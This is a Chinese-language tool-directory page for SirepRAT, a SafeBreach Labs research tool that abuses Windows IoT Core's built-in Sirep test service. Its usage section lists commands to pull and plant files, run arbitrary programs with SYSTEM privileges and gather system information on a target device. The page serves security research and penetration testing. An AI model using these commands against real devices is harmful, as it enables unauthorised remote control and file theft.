Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SirepRAT — 以SYSTEM权限在Windows IoT Core上远程执行命令(提供Python2.7和Python3版本) | Kitploit
工具/GitHubGitHub/safebreach-labs/sireprat
物联网安全漏洞利用后渗透利用渗透测试命令与控制远程访问工具Payload 开发
GitHubsafebreach-labs/sireprat

SirepRAT

以SYSTEM权限在Windows IoT Core上远程执行命令(提供Python2.7和Python3版本)

查看仓库
388915年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

SirepRAT

SirepRAT - 在Windows IoT Core上以SYSTEM权限执行远程命令

SirepRAT 无需在目标上编写真正的RAT恶意软件即可实现完整的RAT功能。

背景

该方法利用了微软官方镜像中内置并运行的Sirep测试服务。该服务是HLK设置中的客户端部分,用于对IoT设备进行驱动程序/硬件测试。它实现了Sirep/WPCon/TShell协议。

我们分析了Sirep/WPCon协议,并展示了该协议如何为攻击者暴露一个远程命令接口,包括RAT能力,如从任意位置获取/放置任意文件以及获取系统信息。

基于我们从该服务及协议研究中提取的发现,我们构建了一个简单的Python工具,利用支持的不同命令进行利用。我们将其命名为SirepRAT。

它提供了一个简单直观的用户界面,用于向Windows IoT Core目标发送命令。它适用于任何通过线缆连接、运行Windows IoT Core并使用微软官方镜像的设备。

演示文稿和白皮书

演示文稿和研究白皮书在文档文件夹中

安装

root@kitploit:~
pip install -r requirements.txt

用法

下载文件

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

上传文件

root@kitploit:~
python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

运行任意程序

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

带参数,并以当前登录用户身份模拟执行:

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

(尝试不使用 as_logged_on_user 标志运行,以演示SYSTEM执行能力)

获取系统信息

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice

获取文件信息

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

查看帮助获取完整详情:

root@kitploit:~
python SirepRAT.py --help

作者

Dor Azouri (@bemikre)

贡献者

movatica (@movatica) - 移植到Python 3!(在2020年终点线前完成)

许可证

BSD 3 - “新”或“修订”条款许可证

下载工具